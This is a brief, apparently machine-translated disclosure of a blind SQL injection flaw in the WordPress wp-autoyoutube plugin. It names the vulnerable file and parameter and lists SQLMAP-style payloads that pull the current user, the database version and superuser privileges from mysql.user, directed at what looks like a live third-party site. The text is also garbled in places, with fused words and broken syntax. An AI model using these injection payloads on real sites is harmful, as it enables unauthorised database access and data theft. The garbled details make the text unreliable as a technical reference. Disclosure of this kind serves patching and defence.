Title: WordPress wp-autoyoutube plugin Blind SQL Injection
Vulnerability
Author: longrifle0x www.2cto.com
Software: Wordpress
: Http://wordpress.org/extend/plugins/wp-autoyoutube/
Test Tool: SQLMAP
Overview
Wordpress plug-in wp-autoyoutube was found to have a blind injection Problem
File:
Wp-content/plugins/wp-autoyoutube/modules/index. php
Test method: id =-1; or 1 = if
* Test *
Http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index. php [GET] [id =-1] [CURRENT_USER ()
Http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index. php [GET] [id =-1] [SELECT (CASE
WHEN (SELECT super_priv FROMmysql. user WHERE user = 'none' LIMIT
0, 1) = 'y') THEN 1 ELSE 0 END)
Http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index. php [GET] [id =-1] [MID (VERSION)
Www.2cto.com
Wp-content/plugins/wp-autoyoutube/modules/index. php filter parameter input on this page